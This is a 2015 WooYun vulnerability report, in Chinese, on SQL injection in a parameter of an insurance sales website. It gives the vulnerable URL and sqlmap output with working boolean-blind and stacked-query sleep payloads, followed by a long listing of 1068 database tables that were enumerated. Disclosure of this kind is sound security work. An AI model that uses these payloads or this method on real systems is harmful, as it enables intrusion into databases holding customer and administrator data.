泛华保险旗下网站SQL注入（1068数据表/涉及管理员账号密码用户信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144199

漏洞标题：泛华保险旗下网站SQL注入（1068数据表/涉及管理员账号密码用户信息）

漏洞作者：深度安全实验室

提交时间：2015-09-30 11:36

修复时间：2015-10-13 09:00

公开时间：2015-10-13 09:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-30：细节已通知厂商并且等待厂商处理中
2015-10-13：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

泛华世纪保险销售服务有限公司成立于2011年，注册资本金5000万，是全国性专业保险代理公司。泛华世纪拥有注册商标“保网”，以及域名www.baoxian.com。是全国第一批保监会批准的保险网销资质企业，是美国纳斯达克上市公司--泛华企业服务集团（CISG）在传统渠道基础上打造的专业第三方保险电子商务平台。

详细说明：

如下链接存在SQL注入，其中00000000000000002971_Period参数有问题

http://www.baoxian.com/console/shop/filter!premDoCal.action?00000000000000002970_TextAge=18Y-25Y&00000000000000002971_Period=1Y&00000000000000002972_Mult=1&00000000000000002973_Sex=2&DutyAmnt=&prem_callback=jQuery16307399703748524189_1443519691925&RiskCode=101401001&_=1443519907568 (GET)

漏洞证明：

涉及2个库

以product库为例，涉及1068个表

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: 00000000000000002971_Period (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: 00000000000000002970_TextAge=18Y-25Y&00000000000000002971_Period=1Y' AND 2249=2249 AND 'YJhA'='YJhA&00000000000000002972_Mult=1&00000000000000002973_Sex=2&DutyAmnt=&prem_callback=jQuery16307399703748524189_1443519691925&RiskCode=101401001&_=1443519907568
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: 00000000000000002970_TextAge=18Y-25Y&00000000000000002971_Period=1Y';(SELECT * FROM (SELECT(SLEEP(5)))LgSa)#&00000000000000002972_Mult=1&00000000000000002973_Sex=2&DutyAmnt=&prem_callback=jQuery16307399703748524189_1443519691925&RiskCode=101401001&_=1443519907568
---
back-end DBMS: MySQL 5.0.11
Database: product
[1068 tables]
+----------------------------------------+
| fcdoc                                  |
| fcdocb                                 |
| fdaddress                              |
| fdagentcardcount                       |
| fdbainianno                            |
| fdbroadcast                            |
| fdchannel                              |
| fdchannelb                             |
| fdchannelrela                          |
| fdchannelrelab                         |
| fdclaimlimitset                        |
| fdcode                                 |
| fdcoderela                             |
| fdcom                                  |
| fdcom3                                 |
| fdcorpclienttype                       |
| fdcusaccount                           |
| fdcusassign                            |
| fdcustobjectaccident                   |
| fdcustobjectagri                       |
| fdcustobjectcar                        |
| fdcustobjectcargo                      |
| fdcustobjectconstruct                  |
| fdcustobjectcredit                     |
| fdcustobjectdevice                     |
| fdcustobjecthouse                      |
| fdcustobjectinvest                     |
| fdcustobjectliab                       |
| fdcustobjectloan                       |
| fdcustobjectprop                       |
| fdcustobjectship                       |
| fdcustomerback                         |
| fdcustomereditinfo                     |
| fddocroot                              |
| fdeditdefine                           |
| fdgroup                                |
| fdgrouppre                             |
| fdgrpaddress                           |
| fdinscom                               |
| fdinscontno                            |
| fdlendlimitset                         |
| fdlendmaxlimitset                      |
| fdlock                                 |
| fdmaxno                                |
| fdmenu                                 |
| fdmenu3                                |
| fdmenugrp                              |
| fdmenugrp3                             |
| fdmenugrptomenu                        |
| fdmenugrptomenu3                       |
| fdoccualludesupplier                   |
| fdoccupation                           |
| fdperson                               |
| fdpersonaddress                        |
| fdpersonpre                            |
| fdpwdhistory                           |
| fdpwdpolicy                            |
| fdrepairshop                           |
| fdrepairshoptocom                      |
| fdsettledefine                         |
| fdsysvar                               |
| fdtask                                 |
| fdtasklog                              |
| fdtaskparam                            |
| fdtaskplan                             |
| fdtaskrunlog                           |
| fdtaskserver                           |
| fduser                                 |
| fduser3                                |
| fdusercom                              |
| fdusercom3                             |
| fdusercontrol                          |
| fduserlog                              |
| fduserlogin                            |
| fdusertomenugrp                        |
| fdusertomenugrp3                       |
| fehealthyinfo                          |
| fehealthyinfob                         |
| femcalmode                             |
| femcalmodeb                            |
| femcarbaseinfoinpub                    |
| femcarbaseinfoinput                    |
| femcarfeecalinfo                       |
| femcarfeecalinfob                      |
| femcarkindplan                         |
| femcarkindplanb                        |
| femcarriskinfo                         |
| femcarriskinfob                        |
| femcommend                             |
| femcommendb                            |
| femcompareinfoset                      |
| femcompareinfosetb                     |
| femdutyamntpremlist                    |
| femdutyamntpremlistb                   |
| femdutyfactor                          |
| femdutyfactorb                         |
| femdutykindfacotorrela                 |
| femproductrelacondition                |
| femrisk                                |
| femriskb                               |
| femriskbrightspotlist                  |
| femriskbrightspotlistb                 |
| femriskcompareproperties               |
| femriskcomparepropertiesb              |
| femriskfactorlist                      |
| femriskfactorlistb                     |
| femriskfactorrela                      |
| femriskfactorrelab                     |
| femriskpaylist                         |
| femriskpaylistb                        |
| femriskpaytypeset                      |
| femriskpaytypesetb                     |
| femrisksalearea                        |
| femrisksaleareab                       |
| femrisktype                            |
| femrisktypeb                           |
| femsearchconditioninfo                 |
| femsearchinfoset                       |
| femsearchinfosetb                      |
| femsearchinnerlib                      |
| femsearchinnerlibb                     |
| femsearchproperties                    |
| femsearchpropertiesb                   |
| femsearchrela                          |
| femsearchrelab                         |
| femsearchrelabatch                     |
| femsearchrelalist                      |
| femsupportkindspeoplelist              |
| femsupportkindspeoplelistb             |
| feriskappfactor                        |
| feriskappfactorb                       |
| feuiinfo                               |
| feuiinfob                              |
| feuiinfovalue                          |
| feuiinfovalueb                         |
| feuiinfovalueb_copy                    |
| flbasefield                            |
| flbasefieldb                           |
| flmriskrate                            |
| flmriskrateb                           |
| flmscheratecalfactorlib                |
| flmscheratecalfactorlibb               |
| fmaccount                              |
| fmbrkkind                              |
| fmbrkrisk                              |
| fmcalfactor                            |
| fmcalmode                              |
| fmcardrisk                             |
| fmcertifydes                           |
| fmcheckfield                           |
| fmcomfirmget                           |
| fmduty                                 |
| fmdutyamntlist                         |
| fmdutyamntlistb                        |
| fmdutyb                                |
| fmdutyrelation                         |
| fmdutyrelationb                        |
| fmedoritem                             |
| fmestateagentfeerate                   |
| fmestateagentfeerateb                  |
| fmindex                                |
| fmitem                                 |
| fmitemdetail                           |
| fmkeyword                              |
| fmkind                                 |
| fmkindb                                |
| fmmessagesfeerate                      |
| fmplan                                 |
| fmplanrisk                             |
| fmpropratebatch                        |
| fmpropratetem                          |
| fmprotocol                             |
| fmprotocolcalitem                      |
| fmprotocolcalitemdefine                |
| fmprotocolcontfeerate                  |
| fmprotocolcontinueconf                 |
| fmprotocolcontinueconfdefine           |
| fmprotocoldefine                       |
| fmprotocolfeerate                      |
| fmprotocolfeerateb                     |
| fmprotocolfeeratedefine                |
| fmprotocolfeeraterela                  |
| fmprotocolfeesql                       |
| fmprotocolfeesqlb                      |
| fmprotocolgrade                        |
| fmprotocolplan                         |
| fmprotocolrisk                         |
| fmrateapprove                          |
| fmreladutycodelist                     |
| fmreladutycodelistb                    |
| fmrisk                                 |
| fmrisk_interface_log                   |
| fmriskaccount                          |
| fmriskapp                              |
| fmriskb                                |
| fmriskcard                             |
| fmriskcopyconfig                       |
| fmriskduty                             |
| fmriskfactor                           |
| fmriskitemdetail                       |
| fmriskpayintv                          |
| fmriskpayperiod                        |
| fmriskrate                             |
| fmriskratetemp                         |
| fmrisksale                             |
| fmrisktype                             |
| fmrisktypeb                            |
| fmriskyear                             |
| fmsetpolrate                           |
| member                                 |
| memberrank                             |
| personinfo2                            |
| product20140121                        |
| productinstype                         |
| producttype                            |
| riskcode00101005dutycode000            |
| riskcode00101006dutycode000            |
| riskcode00101007dutycode000            |
| riskcode00101008dutycode000            |
| riskcode100101018dutycode000           |
| riskcode100101018dutycode000b          |
| riskcode100101019dutycode000           |
| riskcode100101019dutycode000b          |
| riskcode100101020dutycode000           |
| riskcode100101020dutycode000b          |
| riskcode100101022dutycode000           |
| riskcode100101023dutycode000           |
| riskcode100101023dutycode000b          |
| riskcode100101024dutycode000           |
| riskcode100101024dutycode000b          |
| riskcode100101030dutycode000           |
| riskcode100101031dutycode000           |
| riskcode100101032dutycode000           |
| riskcode100401025dutycode000           |
| riskcode100401030dutycode000           |
| riskcode100401031dutycode000           |
| riskcode100401034dutycode000           |
| riskcode100401035dutycode000           |
| riskcode100401046dutycode000           |
| riskcode100401046dutycode000b          |
| riskcode101001010dutycode000           |
| riskcode101001011dutycode000           |
| riskcode101001012dutycode000           |
| riskcode101001013dutycode000           |
| riskcode101001014dutycode000           |
| riskcode101001015dutycode000           |
| riskcode101001016dutycode000           |
| riskcode101001020dutycode000           |
| riskcode101401001dutycode000           |
| riskcode101401001dutycode000b          |
| riskcode101401002dutycode000b          |
| riskcode101401003dutycode000b          |
| riskcode101401004dutycode000b          |
| riskcode101401005dutycode000b          |
| riskcode101401006dutycode000b          |
| riskcode101401007dutycode000           |
| riskcode101401007dutycode000b          |
| riskcode101401010dutycode000           |
| riskcode101401010dutycode000b          |
| riskcode101401011dutycode000           |
| riskcode101401011dutycode000b          |
| riskcode101401012dutycode000           |
| riskcode101401012dutycode000b          |
| riskcode101401013dutycode000           |
| riskcode101401013dutycode000b          |
| riskcode200501001dutycode000           |
| riskcode200501001dutycode000b          |
| riskcode200501002dutycode000           |
| riskcode200501002dutycode000b          |
| riskcode200501003dutycode000           |
| riskcode200501003dutycode000b          |
| riskcode200501004dutycode000           |
| riskcode200501004dutycode000b          |
| riskcode200501005dutycode000           |
| riskcode200501005dutycode000b          |
| riskcode200501006dutycode000           |
| riskcode200501006dutycode000b          |
| riskcode200501007dutycode000           |
| riskcode200501007dutycode000b          |
| riskcode200501008dutycode000           |
| riskcode200501008dutycode000b          |
| riskcode200501011dutycode000           |
| riskcode200501011dutycode000b          |
| riskcode200501012dutycode000           |
| riskcode200501012dutycode000b          |
| riskcode200501013dutycode000           |
| riskcode200501013dutycode000b          |
| riskcode200501014dutycode000           |
| riskcode200501014dutycode000b          |
| riskcode200501015dutycode000           |
| riskcode200501015dutycode000b          |
| riskcode200501016dutycode000           |
| riskcode200501016dutycode000b          |
| riskcode200501017dutycode000           |
| riskcode200501017dutycode000b          |
| riskcode200501018dutycode000           |
| riskcode200501018dutycode000b          |
| riskcode200501019dutycode000           |
| riskcode200501019dutycode000b          |
| riskcode200501020dutycode000           |
| riskcode200501020dutycode000b          |
| riskcode200501021dutycode000           |
| riskcode200501021dutycode000b          |
| riskcode200501022dutycode000           |
| riskcode200501023dutycode000           |
| riskcode200501024dutycode000           |
| riskcode200501025dutycode000           |
| riskcode200501026dutycode000           |
| riskcode200501027dutycode000           |
| riskcode200501028dutycode000           |
| riskcode200501029dutycode000           |
| riskcode200501030dutycode000           |
| riskcode200501030dutycode000b          |
| riskcode200701001dutycode000           |
| riskcode200701001dutycode000b          |
| riskcode200701002dutycode000           |
| riskcode200701002dutycode000b          |
| riskcode200701003dutycode000           |
| riskcode200701003dutycode000b          |
| riskcode200701004dutycode000           |
| riskcode200701004dutycode000b          |
| riskcode200701005dutycode000           |
| riskcode200701005dutycode000b          |
| riskcode200701006dutycode000           |
| riskcode200701006dutycode000b          |
| riskcode200701007dutycode000           |
| riskcode200701007dutycode000b          |
| riskcode200701008dutycode000           |
| riskcode200701008dutycode000b          |
| riskcode200701009dutycode000           |
| riskcode200701009dutycode000b          |
| riskcode200701010dutycode000           |
| riskcode200701010dutycode000b          |
| riskcode200701011dutycode000           |
| riskcode200701011dutycode000b          |
| riskcode200701012dutycode000           |
| riskcode200701012dutycode000b          |
| riskcode200701013dutycode000           |
| riskcode200701013dutycode000b          |
| riskcode200701014dutycode000           |
| riskcode200701014dutycode000b          |
| riskcode200701015dutycode000           |
| riskcode200701015dutycode000b          |
| riskcode200701016dutycode000           |
| riskcode200701016dutycode000b          |
| riskcode200701017dutycode000           |
| riskcode200701017dutycode000b          |
| riskcode200701018dutycode000           |
| riskcode200701018dutycode000b          |
| riskcode200701019dutycode000           |
| riskcode200701019dutycode000b          |
| riskcode200701020dutycode000           |
| riskcode200701020dutycode000b          |
| riskcode200701021dutycode000           |
| riskcode200701021dutycode000b          |
| riskcode200701022dutycode000           |
| riskcode200701022dutycode000b          |
| riskcode200701023dutycode000           |
| riskcode200701023dutycode000b          |
| riskcode200701024dutycode000           |
| riskcode200701024dutycode000b          |
| riskcode200701025dutycode000           |
| riskcode200701025dutycode000b          |
| riskcode200701026dutycode000           |
| riskcode200701026dutycode000b          |
| riskcode200701027dutycode000           |
| riskcode200701027dutycode000b          |
| riskcode200701028dutycode000           |
| riskcode200701028dutycode000b          |
| riskcode200701029dutycode000           |
| riskcode200701029dutycode000b          |
| riskcode200701030dutycode000           |
| riskcode200701030dutycode000b          |
| riskcode200701031dutycode000           |
| riskcode200701031dutycode000b          |
| riskcode200701032dutycode000           |
| riskcode200701032dutycode000b          |
| riskcode200701033dutycode000           |
| riskcode200701033dutycode000b          |
| riskcode200701034dutycode000           |
| riskcode200701034dutycode000b          |
| riskcode200701035dutycode000           |
| riskcode200701035dutycode000b          |
| riskcode200701036dutycode000           |
| riskcode200701036dutycode000b          |
| riskcode200701037dutycode000           |
| riskcode200701037dutycode000b          |
| riskcode200701038dutycode000           |
| riskcode200701038dutycode000b          |
| riskcode200701039dutycode000           |
| riskcode200701039dutycode000b          |
| riskcode200701040dutycode000           |
| riskcode200701040dutycode000b          |
| riskcode200701041dutycode000           |
| riskcode200701041dutycode000b          |
| riskcode200701042dutycode000           |
| riskcode200701042dutycode000b          |
| riskcode200701056dutycode000           |
| riskcode200701056dutycode000b          |
| riskcode200701057dutycode000b          |
| riskcode200701058dutycode000           |
| riskcode200701058dutycode000b          |
| riskcode200701059dutycode000           |
| riskcode200701059dutycode000b          |
| riskcode200701060dutycode000           |
| riskcode200701060dutycode000b          |
| riskcode200701061dutycode000           |
| riskcode200701061dutycode000b          |
| riskcode200701062dutycode000           |
| riskcode200701062dutycode000b          |
| riskcode200701063dutycode000           |
| riskcode200701063dutycode000b          |
| riskcode200701064dutycode000           |
| riskcode200701064dutycode000b          |
| riskcode200701065dutycode000           |
| riskcode200701065dutycode000b          |
| riskcode200701066dutycode000           |
| riskcode200701066dutycode000b          |
| riskcode200701067dutycode000           |
| riskcode200701067dutycode000b          |
| riskcode200701068dutycode000           |
| riskcode200701068dutycode000b          |
| riskcode200701069dutycode000           |
| riskcode200701069dutycode000b          |
| riskcode200701070dutycode000           |
| riskcode200701070dutycode000b          |
| riskcode200701071dutycode000           |
| riskcode200701071dutycode000b          |
| riskcode200701072dutycode000           |
| riskcode200701072dutycode000b          |
| riskcode200701077dutycode000           |
| riskcode200701077dutycode000b          |
| riskcode200701078dutycode000           |
| riskcode200701078dutycode000b          |
| riskcode200701079dutycode000           |
| riskcode200701079dutycode000b          |
| riskcode200701080dutycode000           |
| riskcode200701080dutycode000b          |
| riskcode200702001dutycode000           |
| riskcode200702001dutycode000b          |
| riskcode200702002dutycode000           |
| riskcode200702002dutycode000b          |
| riskcode200702003dutycode000           |
| riskcode200702003dutycode000b          |
| riskcode200702004dutycode000           |
| riskcode200702004dutycode000b          |
| riskcode200702005dutycode000           |
| riskcode200702005dutycode000b          |
| riskcode200702006dutycode000           |
| riskcode200702006dutycode000b          |
| riskcode200702007dutycode000           |
| riskcode200702007dutycode000b          |
| riskcode200702008dutycode000           |
| riskcode200702008dutycode000b          |
| riskcode200702009dutycode000           |
| riskcode200702009dutycode000b          |
| riskcode201101002dutycode000           |
| riskcode201101002dutycode000b          |
| riskcode201101003dutycode000           |
| riskcode201101003dutycode000b          |
| riskcode201101004dutycode000           |
| riskcode201101004dutycode000b          |
| riskcode201101005dutycode000           |
| riskcode201101005dutycode000b          |
| riskcode201101006dutycode000           |
| riskcode201101006dutycode000b          |
| riskcode201101007dutycode000           |
| riskcode201101007dutycode000b          |
| riskcode201101008dutycode000b          |
| riskcode201101009dutycode000           |
| riskcode201101009dutycode000b          |
| riskcode201101010dutycode000           |
| riskcode201101010dutycode000b          |
| riskcode201101011dutycode000           |
| riskcode201101011dutycode000b          |
| riskcode201101013dutycode000           |
| riskcode201101013dutycode000b          |
| riskcode201101014dutycode000           |
| riskcode201101014dutycode000b          |
| riskcode201101015dutycode000           |
| riskcode201101015dutycode000b          |
| riskcode201101021dutycode000b          |
| riskcode201101021dutycodetpyblywa01    |
| riskcode201101021dutycodetpyblywa01b   |
| riskcode201101021dutycodetpyblywa02    |
| riskcode201101021dutycodetpyblywa02b   |
| riskcode201101021dutycodetpyblywa03    |
| riskcode201101021dutycodetpyblywa03b   |
| riskcode201101022dutycode000b          |
| riskcode201101022dutycodetpyblywb01    |
| riskcode201101022dutycodetpyblywb01b   |
| riskcode201101022dutycodetpyblywb02    |
| riskcode201101022dutycodetpyblywb02b   |
| riskcode201101022dutycodetpyblywb03    |
| riskcode201101022dutycodetpyblywb03b   |
| riskcode201101023dutycode000b          |
| riskcode201101023dutycodetpyblywc01    |
| riskcode201101023dutycodetpyblywc01b   |
| riskcode201101023dutycodetpyblywc02    |
| riskcode201101023dutycodetpyblywc02b   |
| riskcode201101023dutycodetpyblywc03    |
| riskcode201101023dutycodetpyblywc03b   |
| riskcode201101024dutycode000b          |
| riskcode201101024dutycodetpyblywd01    |
| riskcode201101024dutycodetpyblywd01b   |
| riskcode201101024dutycodetpyblywd02    |
| riskcode201101024dutycodetpyblywd02b   |
| riskcode201101024dutycodetpyblywd03    |
| riskcode201101024dutycodetpyblywd03b   |
| riskcode201101025dutycode000b          |
| riskcode201101025dutycodetpyllywa01    |
| riskcode201101025dutycodetpyllywa01b   |
| riskcode201101025dutycodetpyllywa02    |
| riskcode201101025dutycodetpyllywa02b   |
| riskcode201101026dutycode000b          |
| riskcode201101026dutycodetpyllywb01    |
| riskcode201101026dutycodetpyllywb01b   |
| riskcode201101026dutycodetpyllywb02    |
| riskcode201101026dutycodetpyllywb02b   |
| riskcode201101026dutycodetpyllywb03    |
| riskcode201101026dutycodetpyllywb03b   |
| riskcode201101027dutycode000b          |
| riskcode201101027dutycodetpyllywc01    |
| riskcode201101027dutycodetpyllywc01b   |
| riskcode201101027dutycodetpyllywc02    |
| riskcode201101027dutycodetpyllywc02b   |
| riskcode201101027dutycodetpyllywc03    |
| riskcode201101027dutycodetpyllywc03b   |
| riskcode201101028dutycode000b          |
| riskcode201101028dutycodetpyllywd01    |
| riskcode201101028dutycodetpyllywd01b   |
| riskcode201101028dutycodetpyllywd02    |
| riskcode201101028dutycodetpyllywd02b   |
| riskcode201101028dutycodetpyllywd03    |
| riskcode201101028dutycodetpyllywd03b   |
| riskcode201101029dutycode000b          |
| riskcode201101029dutycodetpywlywa01    |
| riskcode201101029dutycodetpywlywa01b   |
| riskcode201101029dutycodetpywlywa02    |
| riskcode201101029dutycodetpywlywa02b   |
| riskcode201101030dutycode000b          |
| riskcode201101030dutycodetpywlywb01    |
| riskcode201101030dutycodetpywlywb01b   |
| riskcode201101030dutycodetpywlywb02    |
| riskcode201101030dutycodetpywlywb02b   |
| riskcode201101030dutycodetpywlywb03    |
| riskcode201101030dutycodetpywlywb03b   |
| riskcode201101031dutycode000b          |
| riskcode201101031dutycodetpywlywc01    |
| riskcode201101031dutycodetpywlywc01b   |
| riskcode201101031dutycodetpywlywc02    |
| riskcode201101031dutycodetpywlywc02b   |
| riskcode201101031dutycodetpywlywc03    |
| riskcode201101031dutycodetpywlywc03b   |
| riskcode201101032dutycode000b          |
| riskcode201101032dutycodetpywlywd01    |
| riskcode201101032dutycodetpywlywd01b   |
| riskcode201101032dutycodetpywlywd02    |
| riskcode201101032dutycodetpywlywd02b   |
| riskcode201101032dutycodetpywlywd03    |
| riskcode201101032dutycodetpywlywd03b   |
| riskcode201101033dutycode000b          |
| riskcode201101033dutycodetpyllzyywa01  |
| riskcode201101033dutycodetpyllzyywa01b |
| riskcode201101033dutycodetpyllzyywa02  |
| riskcode201101033dutycodetpyllzyywa02b |
| riskcode201101034dutycode000b          |
| riskcode201101034dutycodetpyllzyywb01  |
| riskcode201101034dutycodetpyllzyywb01b |
| riskcode201101034dutycodetpyllzyywb02  |
| riskcode201101034dutycodetpyllzyywb02b |
| riskcode201101034dutycodetpyllzyywb03  |
| riskcode201101034dutycodetpyllzyywb03b |
| riskcode201101035dutycode000b          |
| riskcode201101035dutycodetpytdywa01    |
| riskcode201101035dutycodetpytdywa01b   |
| riskcode201101035dutycodetpytdywa02    |
| riskcode201101035dutycodetpytdywa02b   |
| riskcode201101036dutycode000b          |
| riskcode201101036dutycodetpytdywb01    |
| riskcode201101036dutycodetpytdywb01b   |
| riskcode201101036dutycodetpytdywb02    |
| riskcode201101036dutycodetpytdywb02b   |
| riskcode201101036dutycodetpytdywb03    |
| riskcode201101036dutycodetpytdywb03b   |
| riskcode201101139dutycode000           |
| riskcode201101139dutycode000b          |
| riskcode201102004dutycode000           |
| riskcode201102004dutycode000b          |
| riskcode201102009dutycode000b          |
| riskcode201102011dutycode000b          |
| riskcode201102012dutycode000b          |
| riskcode201102013dutycode000b          |
| riskcode202101002dutycode000000237901  |
| riskcode202101002dutycode000000237902  |
| riskcode202101002dutycode000000237903  |
| riskcode202101002dutycode000000237904  |
| riskcode202101003dutycode000000237801  |
| riskcode202101003dutycode000000237802  |
| riskcode202101003dutycode000000237803  |
| riskcode202101003dutycode000000237804  |
| riskcode202101004dutycode000000238301  |
| riskcode202101004dutycode000000238302  |
| riskcode202101004dutycode000000238304  |
| riskcode202101004dutycode000000238306  |
| riskcode202101004dutycode000b          |
| riskcode202101005dutycode000000238201  |
| riskcode202101005dutycode000000238202  |
| riskcode202101005dutycode000000238203  |
| riskcode202101006dutycode0000002379011 |
| riskcode202101006dutycode0000002379021 |
| riskcode202101006dutycode0000002379031 |
| riskcode202101006dutycode0000002379041 |
| riskcode202101007dutycode000b          |
| riskcode202101008dutycode000b          |
| riskcode202101009dutycode000b          |
| riskcode202101010dutycode2021010101    |
| riskcode202101010dutycode2021010102    |
| riskcode202101010dutycode2021010103    |
| riskcode202101010dutycode2021010104    |
| riskcode202101010dutycode2021010105    |
| riskcode202101011dutycode2021010111    |
| riskcode202101011dutycode2021010112    |
| riskcode202101011dutycode2021010113    |
| riskcode202101011dutycode2021010114    |
| riskcode202101011dutycode2021010115    |
| riskcode202101012dutycode2021010121    |
| riskcode202101012dutycode2021010122    |
| riskcode202101012dutycode2021010123    |
| riskcode202101012dutycode2021010124    |
| riskcode202101013dutycode000b          |
| riskcode202101013dutycodeeia014005701  |
| riskcode202101013dutycodeeia014005701b |
| riskcode202101013dutycodeeia014005702  |
| riskcode202101013dutycodeeia014005702b |
| riskcode202101014dutycode000b          |
| riskcode202101014dutycodeeia014005601  |
| riskcode202101014dutycodeeia014005601b |
| riskcode202101014dutycodeeia014005602  |
| riskcode202101014dutycodeeia014005602b |
| riskcode202101014dutycodeeia014005603  |
| riskcode202101014dutycodeeia014005603b |
| riskcode202101017dutycode000b          |
| riskcode202101017dutycodeeva014001001  |
| riskcode202101017dutycodeeva014001001b |
| riskcode202101017dutycodeeva014001002  |
| riskcode202101017dutycodeeva014001002b |
| riskcode202101017dutycodeeva014001003  |
| riskcode202101017dutycodeeva014001003b |
| riskcode202101017dutycodeeva014001004  |
| riskcode202101017dutycodeeva014001004b |
| riskcode202101018dutycode000b          |
| riskcode202101018dutycodeeva014001101  |
| riskcode202101018dutycodeeva014001101b |
| riskcode202101018dutycodeeva014001102  |
| riskcode202101018dutycodeeva014001102b |
| riskcode202101018dutycodeeva014001103  |
| riskcode202101018dutycodeeva014001103b |
| riskcode202101018dutycodeeva014001104  |
| riskcode202101018dutycodeeva014001104b |
| riskcode202101019dutycode000b          |
| riskcode202101019dutycodeegd014001401  |
| riskcode202101019dutycodeegd014001401b |
| riskcode202101019dutycodeegd014001402  |
| riskcode202101019dutycodeegd014001402b |
| riskcode202101019dutycodeegd014001403  |
| riskcode202101019dutycodeegd014001403b |
| riskcode202101019dutycodeegd014001404  |
| riskcode202101019dutycodeegd014001404b |
| riskcode202101020dutycode000b          |
| riskcode202101020dutycodeegd014001801  |
| riskcode202101020dutycodeegd014001801b |
| riskcode202101020dutycodeegd014001802  |
| riskcode202101020dutycodeegd014001802b |
| riskcode202101020dutycodeegd014001803  |
| riskcode202101020dutycodeegd014001803b |
| riskcode202101020dutycodeegd014001804  |
| riskcode202101020dutycodeegd014001804b |
| riskcode202101021dutycode000b          |
| riskcode202101021dutycodeeia014005801  |
| riskcode202101021dutycodeeia014005801b |
| riskcode202101021dutycodeeia014005803  |
| riskcode202101021dutycodeeia014005803b |
| riskcode202101022dutycode000b          |
| riskcode202101022dutycodeeia014005901  |
| riskcode202101022dutycodeeia014005901b |
| riskcode202101022dutycodeeia014005903  |
| riskcode202101022dutycodeeia014005903b |
| riskcode202201001dutycode000           |
| riskcode202201001dutycode000b          |
| riskcode202201002dutycode000           |
| riskcode202201002dutycode000b          |
| riskcode202201004dutycode000           |
| riskcode202201004dutycode000b          |
| riskcode202201005dutycode000           |
| riskcode202201005dutycode000b          |
| riskcode202201007dutycode000           |
| riskcode202201007dutycode000b          |
| riskcode202201008dutycode000           |
| riskcode202201008dutycode000b          |
| riskcode202201009dutycode000           |
| riskcode202201009dutycode000b          |
| riskcode202201010dutycode000           |
| riskcode202201010dutycode000b          |
| riskcode202201011dutycode000           |
| riskcode202201011dutycode000b          |
| riskcode202201012dutycode000           |
| riskcode202201012dutycode000b          |
| riskcode202201018dutycode000b          |
| riskcode202201019dutycode000b          |
| riskcode202201020dutycode000           |
| riskcode202201020dutycode000b          |
| riskcode202201021dutycode000           |
| riskcode202201021dutycode000b          |
| riskcode202201022dutycode000           |
| riskcode202201022dutycode000b          |
| riskcode202201023dutycode000b          |
| riskcode202201024dutycode000b          |
| riskcode202201025dutycode000           |
| riskcode202201025dutycode000b          |
| riskcode202201026dutycode000           |
| riskcode202201026dutycode000b          |
| riskcode202201027dutycode000           |
| riskcode202201027dutycode000b          |
| riskcode202201028dutycode000           |
| riskcode202201028dutycode000b          |
| riskcode202202001dutycode000           |
| riskcode202202001dutycode000b          |
| riskcode202232001dutycode000           |
| riskcode202232001dutycode000b          |
| riskcode202301001dutycode000           |
| riskcode202301001dutycode000b          |
| riskcode202301002dutycode000           |
| riskcode202301002dutycode000b          |
| riskcode202301003dutycode000           |
| riskcode202301003dutycode000b          |
| riskcode202301004dutycode000           |
| riskcode202301004dutycode000b          |
| riskcode202301008dutycode000           |
| riskcode202301008dutycode000b          |
| riskcode202301009dutycode000           |
| riskcode202301009dutycode000b          |
| riskcode202301010dutycode000           |
| riskcode202301010dutycode000b          |
| riskcode202301011dutycode000           |
| riskcode202301011dutycode000b          |
| riskcode202301012dutycode000           |
| riskcode202301012dutycode000b          |
| riskcode202301013dutycode000           |
| riskcode202301013dutycode000b          |
| riskcode202301014dutycode000           |
| riskcode202301014dutycode000b          |
| riskcode202301015dutycode000b          |
| riskcode202301016dutycode000           |
| riskcode202301016dutycode000b          |
| riskcode202302001dutycode000           |
| riskcode202302001dutycode000b          |
| riskcode203401001dutycode000           |
| riskcode203401001dutycode000b          |
| riskcode203401002dutycode000           |
| riskcode203401002dutycode000b          |
| riskcode203401003dutycode000           |
| riskcode203401003dutycode000b          |
| riskcode203401004dutycode000           |
| riskcode203401004dutycode000b          |
| riskcode203401005dutycode000           |
| riskcode203401005dutycode000b          |
| riskcode203401006dutycode000           |
| riskcode203401006dutycode000b          |
| riskcode203401007dutycode000           |
| riskcode203401007dutycode000b          |
| riskcode203401008dutycode000           |
| riskcode203401008dutycode000b          |
| riskcode203401009dutycode000           |
| riskcode203401009dutycode000b          |
| riskcode203401010dutycode000           |
| riskcode203401010dutycode000b          |
| riskcode203401011dutycode000           |
| riskcode203401011dutycode000b          |
| riskcode203401012dutycode000           |
| riskcode203401012dutycode000b          |
| riskcode203401013dutycode000           |
| riskcode203401013dutycode000b          |
| riskcode203401014dutycode000           |
| riskcode203401014dutycode000b          |
| riskcode203401015dutycode000           |
| riskcode203401015dutycode000b          |
| riskcode203401016dutycode000           |
| riskcode203401016dutycode000b          |
| riskcode203401017dutycode000           |
| riskcode203401017dutycode000b          |
| riskcode203401018dutycode000           |
| riskcode203401018dutycode000b          |
| riskcode203401019dutycode000           |
| riskcode203401019dutycode000b          |
| riskcode203498001dutycode000           |
| riskcode203498001dutycode000b          |
| riskcode204201001dutycode000           |
| riskcode204201001dutycode000b          |
| riskcode204201002dutycode000           |
| riskcode204201002dutycode000b          |
| riskcode204301004dutycode000           |
| riskcode204301004dutycode000b          |
| riskcode204301005dutycode000           |
| riskcode204301005dutycode000b          |
| riskcode204301006dutycode000           |
| riskcode204301006dutycode000b          |
| riskcode204301007dutycode000           |
| riskcode204301007dutycode000b          |
| riskcode204301011dutycode000           |
| riskcode204302001dutycode000           |
| riskcode204302001dutycode000b          |
| riskcode204398007dutycode2043980071    |
| riskcode204398007dutycode20439800710   |
| riskcode204398007dutycode2043980073    |
| riskcode204398007dutycode2043980074    |
| riskcode204398007dutycode2043980075    |
| riskcode204398007dutycode2043980076    |
| riskcode204398007dutycode2043980077    |
| riskcode204398007dutycode2043980078    |
| riskcode204398007dutycode2043980079    |
| riskcode204398014dutycode2043980141    |
| riskcode204398014dutycode20439801410   |
| riskcode204398014dutycode20439801411   |
| riskcode204398014dutycode20439801412   |
| riskcode204398014dutycode2043980142    |
| riskcode204398014dutycode2043980143    |
| riskcode204398014dutycode2043980144    |
| riskcode204398014dutycode2043980145    |
